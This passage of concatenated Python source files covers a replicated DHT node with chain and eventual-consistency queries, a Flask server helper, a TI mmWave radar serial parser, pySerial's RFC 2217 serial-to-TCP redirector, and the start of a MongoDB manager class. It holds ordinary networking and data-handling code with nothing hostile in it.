return wait_req
def delete_chain(self, key):
'''
API request to delete the pair with the given key using chain replication.
If it doesn't exist, nothing happens.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.deleteFromDht(key, hashkey)
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
# propagate replica deletion to replicas. Start with counter = n_replicas-1
mode = "Deletion"
delete_req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=delete_msg.__dict__)).json()
return {"status": "Success", \
"text": f"Successfuly deleted {key} from node {self.assigned_id}"}
else:
# node is not replica manager for this particular hashkey
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
delete_req = (requests.post(f"http://{self.next_ip}/propagate_delete_2manager/", json=delete_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
return wait_req
def query(self, key):
'''
API request for the value that corresponds to a
key stored in the node's hash table.
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
queryVal = self.queryFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
else:
# current node not responsible for hashkey. Construct Query Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_eventual(self, key):
'''
API request for the value that corresponds to a
key stored in the node's hash table (eventual consistency: replicas may answer).
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
queryVal = self.queryFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
elif hashkey in self.getReplDHT().keys():
queryVal = self.queryFromReplDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
else:
# current node not responsible for hashkey. Construct Query Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_repl/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_chain(self, key):
'''
API request for the value that corresponds to a
key stored in the node's hash table (chain replication: reads go to the tail).
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
# queryVal = self.queryFromDht(key, hashkey)
msg_id = self.getMsgId()
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_repl/", json=query_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
else:
# current node not responsible for hashkey. Construct Query Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
if hashkey in self.getReplDHT().keys():
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1, direction='l')
else:
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_2manager/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_all(self):
'''
API request for all <key, value> pairs in the P2P network (gathered from every node)
'''
msg_id = self.getMsgId()
queryall_msg = QueryAllMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_DHT=self.DHT, msg="")
# begin asking for query * from next ip
queryall_req = (requests.post(f"http://{self.next_ip}/add2queryall", json=queryall_msg.__dict__)).json()
# wait for response at wait4queryall route
queryall_response = (requests.get(f"http://{self.ip}/wait4queryall/{msg_id}")).json()
return queryall_response
def getBootstrap(self):
return self.isBootstrap
def get_n_replicas(self):
'''
returns number of replicas
'''
return self.n_replicas
def getNext(self):
'''
get next node's id
'''
return self.next_id
def getNextIp(self):
'''
get next node's ip
'''
return self.next_ip
def getPrev(self):
'''
get previous node's id
'''
return self.prev_id
def getPrevIp(self):
'''
get prev node's ip
'''
return self.prev_ip
def getAssignedId(self):
'''
returns node's assigned id
'''
return self.assigned_id
def getIp(self):
'''
returns node's ip
'''
return self.ip
def getDHT(self):
'''
get DHT from local Node
'''
return self.DHT
def getReplDHT(self):
'''
get Replica DHT from local Node
'''
return self.repl_DHT
def getTotalDHT(self):
'''
Returns DHT merged with replica DHT.
'''
return merge_dict(self.DHT, self.repl_DHT)
def getMsgId(self):
'''
Returns a unique message id of the form <nodeId>_<counter> (e.g. "3_7").
The id is unique across the whole network.
'''
print("before: ", self.msg_id)
self.msg_id += 1
print("after: ", self.msg_id)
return str(self.assigned_id) + "_" + str(self.msg_id)
def getPolicy(self):
'''
Returns the node's replication policy, if any.
'''
return self.policy
def getOverlay(self):
'''
API request to get overlay of network's topology.
'''
msg_id = self.getMsgId()
overlay_msg = OverlayMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="")
# begin asking for overlay from next ip
overlay_req = (requests.post(f"http://{self.next_ip}/add2overlay/", json=overlay_msg.__dict__)).json()
# wait for response at wait4overlay route
overlay_response = (requests.get(f"http://{self.ip}/wait4overlay/{self.assigned_id}/{msg_id}")).json()
return overlay_response
def getOverlayResponses(self):
return self.responses
def getAck(self):
return self.ack
def getAckValue(self):
return self.ack_value
class BootstrapNode(Node):
def __init__(self, ip, n_replicas, policy):
super().__init__(ip, ip, n_replicas, True, policy)
self.id_ip_dict = {} # key: int, value: str
self.overlay_dict = {} # key: node_id (str), value: node's next id (str). Following "next" order
self.reverse_overlay_dict={} # key: node_id, value: node's prev id. Following "prev" order
for i in range(10):
self.DHT[str(i)] = {}
def check_join(self, joinee_ip):
'''
Returns the assigned position, prev_ip, next_ip, the replica neighbour dicts and the overlay.
'''
joinee_id = getId(joinee_ip)
if joinee_id in self.id_ip_dict:
joinee_id = \
random.choice(list({0,1,2,3,4,5,6,7,8,9} - set(self.id_ip_dict.keys())))
self.id_ip_dict[joinee_id] = joinee_ip
keys_in_dict = sorted(list(self.id_ip_dict.keys()))
self_index_in_dict = keys_in_dict.index(joinee_id)
# get previous nodes ips, ids
prev_id = keys_in_dict[(self_index_in_dict -1)%len(keys_in_dict)]
next_id = keys_in_dict[(self_index_in_dict +1)%len(keys_in_dict)]
prev_ip = self.id_ip_dict[prev_id]
next_ip = self.id_ip_dict[next_id]
# update overlay dict
self.overlay_dict[str(joinee_id)] = str(next_id)
self.reverse_overlay_dict[str(joinee_id)] = str(prev_id)
if len(self.overlay_dict) == 2:
self.overlay_dict[str(next_id)] = str(joinee_id)
self.reverse_overlay_dict[str(prev_id)] = str(joinee_id)
else:
self.overlay_dict[str(prev_id)] = str(joinee_id)
self.reverse_overlay_dict[str(next_id)] = str(joinee_id)
print("\x1b[33mOverlay\x1b[0m:", self.overlay_dict)
print("\x1b[33mId-Ip\x1b[0m:", self.id_ip_dict)
print("\x1b[33mJoinee\x1b[0m:", joinee_id, type(joinee_id))
# if Network uses replicas:
if self.n_replicas > 1:
# find the n_replicas-1 consecutive next nodes (to be replicated by the joining node)
n_next_nodes = get_n_consequent(self.overlay_dict, self.id_ip_dict,\
self.n_replicas-1, str(joinee_id))
# find the n_replicas-1 consecutive previous nodes (that may have to update their repl_DHT)
n_prev_nodes = get_n_consequent(self.reverse_overlay_dict, self.id_ip_dict, \
self.n_replicas-1, str(joinee_id))
else:
n_next_nodes = {}
n_prev_nodes = {}
return joinee_id, prev_ip, next_ip, n_next_nodes, n_prev_nodes, self.overlay_dict
def check_depart(self, departee_id):
# if Network uses replicas:
if self.n_replicas > 1:
# find the n_replicas-1 consecutive previous nodes (that may have to update their repl_DHT)
n_prev_nodes = get_n_consequent(self.reverse_overlay_dict, self.id_ip_dict, \
self.n_replicas-1, departee_id)
else:
n_next_nodes = {}
n_prev_nodes = {}
self.id_ip_dict.pop(int(departee_id))
return n_prev_nodes, self.overlay_dict
def get_id_ip_dict(self):
return self.id_ip_dict
if __name__== '__main__':
print("testing node.py")
|
flask_helper.py
|
# Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from flask import Flask
from .environment_detector import build_environment
from .environments.credentialed_vm_environment import CREDENTIALED_VM
from .environments.public_vm_environment import PUBLIC_VM
import socket
import threading
import atexit
import uuid
import time
from gevent.pywsgi import WSGIServer
LOCALHOST = 'localhost'
VM_ENVS = {CREDENTIALED_VM, PUBLIC_VM}
class FlaskHelper(object):
"""FlaskHelper is a class for common Flask utilities used in dashboards."""
def __init__(self, ip=None, port=None, with_credentials=False):
# The name passed to Flask needs to be unique per instance.
self.app = Flask(uuid.uuid4().hex)
self.port = port
self.ip = ip
self.with_credentials = with_credentials
# dictionary to store arbitrary state for use by consuming classes
self.shared_state = {}
if self.ip is None:
self.ip = "localhost"
if self.port is None:
# Try 100 different ports
available = False
for port in range(5000, 5100):
available = FlaskHelper._is_local_port_available(
self.ip, port, raise_error=False)
if available:
self.port = port
break
if not available:
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port'
parameter"""
raise RuntimeError(
error_message
)
else:
FlaskHelper._is_local_port_available(self.ip, self.port,
raise_error=True)
self.env = build_environment(self)
if self.env.base_url is None:
return
# Sleep for 1 second in order to prevent random errors while
# socket is still closing
time.sleep(1)
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
@staticmethod
def _is_local_port_available(ip, port, raise_error=True):
"""Check whether the specified local port is available.
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# See stack overflow to prevent "Only one usage" random
# errors in tests:
# https://stackoverflow.com/questions/30420512/python-socket-error-only-one-usage-of-each-socket-address-is-normally-permitted
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.bind((LOCALHOST, port))
sock.listen(backlog)
except (socket.error, OSError): # pragma: no cover
if raise_error:
error_message = """Port {0} is not available.
Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
def run(self):
"""TODO."""
class devnull:
write = lambda _: None # noqa: E731
ip = LOCALHOST
# Note: for credentialed or public VM use the private IP address
if self.env_name in VM_ENVS:
host_name = socket.gethostname()
ip = socket.gethostbyname(host_name)
server = WSGIServer((ip, self.port), self.app, log=devnull)
self.app.config["server"] = server
# self.app.config["CACHE_TYPE"] = "null"
server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
server.stop()
atexit.register(closeserver)
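# Illustrative usage (sketch; the endpoint name and port are hypothetical).
# The server is started on a daemon thread from __init__, provided the detected
# environment exposes a base_url:
#   helper = FlaskHelper(ip="localhost", port=5005)
#   @helper.app.route("/health")
#   def health():
#       return "ok"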
|
x8_mmw.py
|
#
# Copyright (c) 2020, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
#
# TI IWR6843 ES2.0 @ mmWave SDK demo of SDK 3.4.0.3
# TI IWR1843 ES1.0 @ mmWave SDK demo of SDK 3.4.0.3
#
import sys
import json
import serial
import threading
from lib.shell import *
from lib.helper import *
from lib.utility import *
# ------------------------------------------------
_meta_ = {
'mss': 'MMW Demo',
'dev': ('xWR18xx', 'xWR68xx',),
'ver': ('03.04.00.03', ),
'cli': 'mmwDemo:/>',
'seq': b'\x02\x01\x04\x03\x06\x05\x08\x07',
'blk': 32,
'aux': 921600,
'ant': (4, 3),
'app': {
'logMagRange': ('plot_range_profile', ), # 'capture_range_profile'),
'noiseProfile': ('plot_range_profile', ),
'detectedObjects': (), # ('plot_detected_objects', 'simple_cfar_clustering'),
'rangeAzimuthHeatMap': ('plot_range_azimuth_heat_map', ),
'rangeDopplerHeatMap': ('plot_range_doppler_heat_map', )
}
}
# ------------------------------------------------
apps = {}
verbose = False
# ------------------------------------------------
def _read_(dat, target=sys.stdout):
target.write(dat)
target.flush()
for ver in _meta_['ver']:
for dev in _meta_['dev']:
if all((tag in dat for tag in (dev, _meta_['mss'], ver))):
return dev # reset detected
if _meta_['cli'] in dat: return (None,) # cli ready
return () # unknown state
def _init_(prt, dev, cfg, dat):
aux = serial.Serial(dat, _meta_['aux'], timeout=0.01)
taux = threading.Thread(target=_data_, args=(aux,))
taux.start()
def _conf_(cfg):
global verbose
c = dict(cfg)
p = {'log_lin': float('nan'), 'fft_comp': float('nan'), 'range_bias': float('nan')}  # keys match the assignment below
if '_comment_' in c:
c.pop('_comment_', None) # remove entry
if '_settings_' in c:
rx_ant = int(c['_settings_']['rxAntennas'])
tx_ant = int(c['_settings_']['txAntennas'])
# common
if c['channelCfg']['rxMask'] is None:
c['channelCfg']['rxMask'] = 2**rx_ant - 1
if c['channelCfg']['txMask'] is None:
n = tx_ant
if n == 1: n = 0
else: n = 2 * n
c['channelCfg']['txMask'] = 1 + n
if c['channelCfg']['cascading'] is None:
c['channelCfg']['cascading'] = 0 # always 0
# range bias for post-processing
if 'rangeBias' not in c['_settings_'] or c['_settings_']['rangeBias'] is None:
c['_settings_']['rangeBias'] = 0
# range bias for pre-processing
if 'compRangeBiasAndRxChanPhase' in c:
if c['compRangeBiasAndRxChanPhase']['rangeBias'] is None:
c['compRangeBiasAndRxChanPhase']['rangeBias'] = c['_settings_']['rangeBias']
if c['compRangeBiasAndRxChanPhase']['phaseBias'] is None or \
type(c['compRangeBiasAndRxChanPhase']['phaseBias']) == list and \
len(c['compRangeBiasAndRxChanPhase']['phaseBias']) == 0:
c['compRangeBiasAndRxChanPhase']['phaseBias'] = [1, 0] * _meta_['ant'][0] * _meta_['ant'][1]
# cli output
if 'verbose' in c['_settings_'] and c['_settings_']['verbose'] is not None:
verbose = c['_settings_']['verbose']
if c['dfeDataOutputMode']['type'] is None:
c['dfeDataOutputMode']['type'] = 1 # legacy (no subframes)
if c['adcCfg']['adcBits'] is None:
c['adcCfg']['adcBits'] = 2 # 16 bit
log_lin_scale = 1.0 / 512
if num_tx_elev_antenna(c) == 1: log_lin_scale = log_lin_scale * 4.0 / 3 # MMWSDK-439
fft_scale_comp_1d = fft_doppler_scale_compensation(32, num_range_bin(c))
fft_scale_comp_2d = 1
fft_scale_comp = fft_scale_comp_2d * fft_scale_comp_1d
p['log_lin'], p['fft_comp'], p['range_bias'] = log_lin_scale, fft_scale_comp, c['_settings_']['rangeBias']
c.pop('_settings_', None) # remove entry
return c, p
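# Worked example for the mask derivation above (illustrative): with
# rxAntennas = 4 and txAntennas = 3, rxMask = 2**4 - 1 = 15 (0b1111, all four
# RX channels) and txMask = 1 + 2*3 = 7 (0b111, TX1..TX3); with txAntennas = 1
# the transmit mask collapses to 1 (TX1 only).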
def _proc_(cfg, par, err={1: 'miss', 2: 'exec', 3: 'plot'}):
global apps
for _, app in apps.items(): app.kill()
apps.clear()
for cmd, app in _meta_['app'].items():
if type(app) not in (list, tuple): app = (app,)
for item in app:
if cmd in cfg['guiMonitor'] and cfg['guiMonitor'][cmd] == 1 and item is not None:
if item not in apps:
apps[item], values = exec_app(item, (cfg, par, ))
if values is None: values = []
code = apps[item].poll()
if code is None:
print_log(item, values)
tapp = threading.Thread(target=_grab_, args=(item,))
tapp.start()
else:
print_log(item, values, RuntimeError(err[code]))
def _pipe_(dat):
for tag in apps:
if apps[tag] is None: continue
try:
apps[tag].stdin.write(str.encode(dat + '\n'))
apps[tag].stdin.flush()
except Exception as e:
print_log(e, sys._getframe(), tag)
apps[tag].kill()
apps[tag] = None
def _grab_(tag):
try:
while True:
line = apps[tag].stderr.readline()
if line:
line = line.decode('latin-1')
print_log(None, tag, line.strip())
except:
pass
# ------------------------------------------------
def _data_(prt): # observe auxiliary port and process incoming data
if not prt.timeout:
raise TypeError('no timeout for serial port provided')
input, output, sync, size = {'buffer': b''}, {}, False, _meta_['blk']
while True:
try:
data = prt.read(size)
input['buffer'] += data
if data[:len(_meta_['seq'])] == _meta_['seq']: # check for magic sequence
if len(output) > 0:
plain = json.dumps(output)
_pipe_(plain)
if verbose:
print(plain, file=sys.stdout, flush=True) # just print output to stdout
input['buffer'] = data
input['blocks'] = -1
input['address'] = 0
input['values'] = 0
input['other'] = {}
output = {}
sync = True # very first frame in the stream was seen
if sync:
flen = 0
while flen < len(input['buffer']): # keep things finite
flen = len(input['buffer'])
aux_buffer(input, output) # do processing of captured bytes
except serial.serialutil.SerialException:
return # leave thread
except Exception as e:
print_log(e, sys._getframe())
# ------------------------------------------------
def aux_buffer(input, output, head=40, indices={
1: 'detected_points', 2: 'range_profile', 3: 'noise_profile',
4: 'azimuth_static', 5: 'range_doppler', 6: 'stats', 7: 'side_info'}):
def aux_head(dat, n=head):
m = dat[ 0: 8] # magic
v = intify(dat[ 8:12], 10) # version
l = intify(dat[12:16]) # length
d = intify(dat[16:20], 10) # platform
f = intify(dat[20:24]) # frame number
t = intify(dat[24:28]) # cpu cycles
o = intify(dat[28:32]) # num objects
s = intify(dat[32:36]) # segments
u = intify(dat[36: n]) # subframe
return n, v, l, d, f, t, o, s, u
def aux_struct(dat, n=8):
t = intify(dat[ 0: 4])
l = intify(dat[ 4: n])
return n, t, l // 2
def aux_object(dat, oth, n=16): # detected points/objects
x = intify(dat[ 0: 4])
y = intify(dat[ 4: 8])
z = intify(dat[ 8:12])
p = intify(dat[12: n])
if x > 32767: x -= 65536
if y > 32767: y -= 65536
if z > 32767: z -= 65536
qfrac = 0
if 'qfrac' in oth: qfrac = oth['qfrac'] # q-notation is used
x = q_to_dec(x, qfrac)
y = q_to_dec(y, qfrac)
z = q_to_dec(z, qfrac)
return n, p, x, y, z
def aux_profile(dat, n=2): # value of range or noise profile
v = intify(dat[ 0: n])
return n, v
def aux_heatmap(dat, sgn, n=2): # value for heatmaps
v = intify(dat[ 0: n])
if sgn and v > 32767: v -= 65536
return n, v
def aux_info(dat, n=24): # performance measures and statistical data
ifpt = intify(dat[ 0: 4])
tot = intify(dat[ 4: 8])
ifpm = intify(dat[ 8:12])
icpm = intify(dat[12:16])
afpl = intify(dat[16:20])
ifpl = intify(dat[20: n])
return n, ifpt, tot, ifpm, icpm, afpl, ifpl
# ----------
buffer, blocks, address, values, other = \
input['buffer'], input['blocks'], input['address'], input['values'], input['other']
def progress(n, block, value):
nonlocal buffer, values, address
buffer = buffer[n:]
values -= 1
if values == 0: address = 0
try:
output[block].append(value)
except:
try:
output[block][value[0]] = value[1]
except:
output[block] = value
# ----------
# 7) point cloud side info
while address == 7 and len(buffer) >= 4 and values > 0:
buffer = buffer[4:] # TODO
values -= 1
if values == 0: address = 0
# 6) statistics (raw values)
if address == 6 and len(buffer) >= 24 and values > 0:
n, ifpt, tot, ifpm, icpm, afpl, ifpl = aux_info(buffer)
progress(n, indices[address], {
'interframe_processing': ifpt,
'transmit_output': tot,
'processing_margin': {
'interframe': ifpm,
'interchirp': icpm},
'cpu_load': {
'active_frame': afpl,
'interframe': ifpl}
})
# 5) range-doppler heatmap: entire, 2D, log mag range/Doppler array
while address == 5 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, False)
progress(n, indices[address], v)
# 4) range-azimuth heatmap: azimuth data from the radar cube matrix
while address == 4 and len(buffer) >= 2 and values > 0:
n, v = aux_heatmap(buffer, True)
progress(n, indices[address], v)
# 3) 1D array of data considered “noise”
while address == 3 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 2) 1D array of log mag range ffts – i.e. the first column of the log mag range-Doppler matrix
while address == 2 and len(buffer) >= 2 and values > 0:
n, v = aux_profile(buffer)
progress(n, indices[address], q_to_db(v))
# 1) point cloud
while address == 1 and len(buffer) >= 16 and values > 0:
buffer = buffer[16:] # TODO
values -= 1
if values == 0: address = 0
# ----------
# 0b) segment
if len(buffer) >= 8 and blocks > 0 and address == 0:
n, address, values = aux_struct(buffer)
buffer = buffer[n:]
blocks -= 1
if address in (1, 7):
values = output['header']['objects']
output[indices[address]] = {}
elif address in (2, 3, 4, 5):
output[indices[address]] = []
elif address in (6, ):
output[indices[address]] = None
# 0a) header
if len(buffer) >= head and blocks == -1 and address == 0 and values == 0:
n, v, l, d, f, t, o, s, u = aux_head(buffer)
buffer = buffer[n:]
blocks = s
output['header'] = {'version': v, 'length': l, 'platform': d, 'number': f, 'time': t, 'objects': o, 'blocks': s, 'subframe': u}
# ----------
input['buffer'] = buffer
input['blocks'] = blocks
input['address'] = address
input['values'] = values
input['other'] = other
|
rfc2217_server.py
|
#!/usr/bin/env python
#
# redirect data from a TCP/IP connection to a serial port and vice versa
# using RFC 2217
#
# (C) 2009-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import logging
import socket
import sys
import time
import threading
import serial
import serial.rfc2217
class Redirector(object):
def __init__(self, serial_instance, socket, debug=False):
self.serial = serial_instance
self.socket = socket
self._write_lock = threading.Lock()
self.rfc2217 = serial.rfc2217.PortManager(
self.serial,
self,
logger=logging.getLogger('rfc2217.server') if debug else None
)
self.log = logging.getLogger('redirector')
def statusline_poller(self):
self.log.debug('status line poll thread started')
while self.alive:
time.sleep(1)
self.rfc2217.check_modem_lines()
self.log.debug('status line poll thread terminated')
def shortcircuit(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.daemon = True
self.thread_read.name = 'serial->socket'
self.thread_read.start()
self.thread_poll = threading.Thread(target=self.statusline_poller)
self.thread_poll.daemon = True
self.thread_poll.name = 'status line poll'
self.thread_poll.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
self.log.debug('reader thread started')
while self.alive:
try:
data = self.serial.read(self.serial.in_waiting or 1)
if data:
# escape outgoing data when needed (Telnet IAC (0xff) character)
self.write(serial.to_bytes(self.rfc2217.escape(data)))
except socket.error as msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.alive = False
self.log.debug('reader thread terminated')
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
with self._write_lock:
self.socket.sendall(data)
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
self.serial.write(serial.to_bytes(self.rfc2217.filter(data)))
except socket.error as msg:
self.log.error('%s' % (msg,))
# probably got disconnected
break
self.stop()
def stop(self):
"""Stop copying"""
self.log.debug('stopping')
if self.alive:
self.alive = False
self.thread_read.join()
self.thread_poll.join()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description="RFC 2217 Serial to Network (TCP/IP) redirector.",
epilog="""\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at once is supported. When the connection is terminated
it waits for the next connect.
""")
parser.add_argument('SERIALPORT')
parser.add_argument(
'-p', '--localport',
type=int,
help='local TCP port, default: %(default)s',
metavar='TCPPORT',
default=2217
)
parser.add_argument(
'-v', '--verbose',
dest='verbosity',
action='count',
help='print more diagnostic messages (option can be given multiple times)',
default=0
)
args = parser.parse_args()
if args.verbosity > 3:
args.verbosity = 3
level = (
logging.WARNING,
logging.INFO,
logging.DEBUG,
logging.NOTSET,
)[args.verbosity]
logging.basicConfig(level=logging.INFO)
#~ logging.getLogger('root').setLevel(logging.INFO)
logging.getLogger('rfc2217').setLevel(level)
# connect to serial port
ser = serial.serial_for_url(args.SERIALPORT, do_not_open=True)
ser.timeout = 3 # required so that the reader thread can exit
# reset control line as no _remote_ "terminal" has been connected yet
ser.dtr = False
ser.rts = False
logging.info("RFC 2217 TCP/IP to Serial redirector - type Ctrl-C / BREAK to quit")
try:
ser.open()
except serial.SerialException as e:
logging.error("Could not open serial port {}: {}".format(ser.name, e))
sys.exit(1)
logging.info("Serving serial port: {}".format(ser.name))
settings = ser.get_settings()
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(('', args.localport))
srv.listen(1)
logging.info("TCP/IP port: {}".format(args.localport))
while True:
try:
client_socket, addr = srv.accept()
logging.info('Connected by {}:{}'.format(addr[0], addr[1]))
client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
ser.rts = True
ser.dtr = True
# enter network <-> serial loop
r = Redirector(
ser,
client_socket,
args.verbosity > 0
)
try:
r.shortcircuit()
finally:
logging.info('Disconnected')
r.stop()
client_socket.close()
ser.dtr = False
ser.rts = False
# Restore port settings (may have been changed by RFC 2217
# capable client)
ser.apply_settings(settings)
except KeyboardInterrupt:
sys.stdout.write('\n')
break
except socket.error as msg:
logging.error(str(msg))
logging.info('--- exit ---')
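# Illustrative client-side check (a sketch): once the redirector is running,
# pySerial clients can reach the shared port through the rfc2217:// URL handler,
# e.g.
#   python -m serial.tools.miniterm rfc2217://localhost:2217
# (the port number assumes the default --localport of 2217).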
|
DBMgr.py
|
import pymongo
import datetime
import time
import calendar
import pprint
import traceback
from threading import Thread
def add_log(msg,obj):
print("Got log:"+msg)
print(obj)
traceback.print_exc()
pymongo.MongoClient().log_db.log.insert({
"msg":msg,
"obj":obj,
"timestamp":datetime.datetime.utcnow()
})
def dump_debug_log():
return pprint.pformat(
list(pymongo.MongoClient().log_db.log.find()),
indent=2)
class DBMgr(object):
def _GetConfigValue(self,key):
try:
ret=self.config_col.find_one({"_id":key})
return ret["value"]
except:
return None
def _SetConfigValue(self,key,value):
self.config_col.replace_one({"_id":key},{"value":value},True)
def _ReadConfigs(self):
self.ROOM_DEFINITION=self._GetConfigValue("ROOM_DEFINITION")
self.APPLIANCE_DEFINITION=self._GetConfigValue("APPLIANCE_DEFINITION")
self.SAMPLING_TIMEOUT_SHORTEST=self._GetConfigValue("SAMPLING_TIMEOUT_SHORTEST")
self.SAMPLING_TIMEOUT_LONGEST=self._GetConfigValue("SAMPLING_TIMEOUT_LONGEST")
self.WATCHDOG_TIMEOUT_USER=self._GetConfigValue("WATCHDOG_TIMEOUT_USER")
self.WATCHDOG_TIMEOUT_APPLIANCE=self._GetConfigValue("WATCHDOG_TIMEOUT_APPLIANCE")
def _ConstructInMemoryGraph(self):
self.list_of_rooms = {}
self.list_of_appliances = {}
self.location_of_users = {}
for room in self.ROOM_DEFINITION:
room["appliances"]=[]
room["users"]=[]
self.list_of_rooms[room["id"]]=room
for appliance in self.APPLIANCE_DEFINITION:
appliance["value"]=0
appliance["total_users"]=0
appliance["rooms"].sort()
self.list_of_appliances[appliance["id"]]=appliance
for roomID in appliance["rooms"]:
self.list_of_rooms[roomID]["appliances"]+=[appliance["id"]]
for room in self.ROOM_DEFINITION:
self.list_of_rooms[room["id"]]["appliances"].sort()
def _HardcodeValues(self):
if ("nwc1000m_light" in self.list_of_appliances):
self.list_of_appliances["nwc1000m_light"]["value"] = 300
if ("nwc10hallway_light" in self.list_of_appliances):
self.list_of_appliances["nwc10hallway_light"]["value"] = 100
if ("nwc10elevator_light" in self.list_of_appliances):
self.list_of_appliances["nwc10elevator_light"]["value"] = 150
if ("nwc8_light" in self.list_of_appliances):
self.list_of_appliances["nwc8_light"]["value"] = 150
if ("nwc7_light" in self.list_of_appliances):
self.list_of_appliances["nwc7_light"]["value"] = 150
if ("nwc1003b_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_light"]["value"] = 675
if ("nwcM1_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM1_fcu"]["value"] = 930
if ("nwcM2_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM2_fcu"]["value"] = 930
if ("nwcM3_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM3_fcu"]["value"] = 930
if ("nwcM4_fcu" in self.list_of_appliances):
self.list_of_appliances["nwcM4_fcu"]["value"] = 930
if ("nwc1008_fcu" in self.list_of_appliances):
self.list_of_appliances["nwc1008_fcu"]["value"] = 550
if ("nwc1008_light" in self.list_of_appliances):
self.list_of_appliances["nwc1008_light"]["value"] = 240
if ("nwc1003b_b_plug" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_b_plug"]["value"] = 93
if ("nwc1003b_c_plug" in self.list_of_appliances):
self.list_of_appliances["nwc1003b_c_plug"]["value"] = 63
if ("nwc1003t_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003t_light"]["value"] = 675
if ("nwc1003d_light" in self.list_of_appliances):
self.list_of_appliances["nwc1003d_light"]["value"] = 675
def __init__(self, start_bg_thread=True):
self.dbc=pymongo.MongoClient()
self.registration_col1=self.dbc.db.registration_col1
self.ranking = self.dbc.db.ranking
